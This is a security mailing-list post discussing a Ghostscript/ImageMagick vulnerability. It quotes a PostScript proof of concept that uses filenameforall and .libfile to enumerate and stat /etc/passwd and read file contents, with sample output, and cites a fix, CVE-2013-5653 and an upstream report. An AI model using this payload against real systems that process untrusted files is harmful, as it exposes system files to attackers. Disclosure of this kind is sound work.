Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Thu, 29 Sep 2016 08:25:54 +0200
From: Florian Weimer <fw@...eb.enyo.de>
To: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

* Tavis Ormandy:

> Here is the code I'm testing with (Note: I really don't know much
> postscript - and I hate it).
>
> $ cat test.ps
> /dumpname {
>     dup             % copy filename
>     dup             % copy filename
>     print           % print filename
>     (\n) print      % print newline
>     status          % stat filename
>     {
>         (stat succeeded\n) print
>         ( ctime:) print
>         64 string cvs print
>         ( atime:) print
>         64 string cvs print
>         ( size:) print
>         64 string cvs print
>         ( blocks:) print
>         64 string cvs print
>         (\n) print
>         (\n) print
>     }{
>         (unable to stat\n\n) print
>     } ifelse
>     .libfile        % open as library
>     {
>         (.libfile returned file\n\n) print
>         64 string readstring
>         pop         % discard result (should proably test)
>         print
>         (\n) print
>     }{
>         (.libfile returned string\n) print
>         print
>         (\n) print
>     } ifelse
> } def
>
> (/etc/pass*) /dumpname load 256 string filenameforall

filenameforall was fixed as part of this:

  http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8
  http://bugs.ghostscript.com/show_bug.cgi?id=694724

This also covers getenv and has already been assigned CVE-2013-5653.

> $ identify test.ps
> /etc/passwd
> stat succeeded
>  ctime:1474998792 atime:1474998792 size:2662 blocks:8
>
> .libfile returned file

.libfile is not yet fixed upstream.  I reported this upstream:

  http://bugs.ghostscript.com/show_bug.cgi?id=697169

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.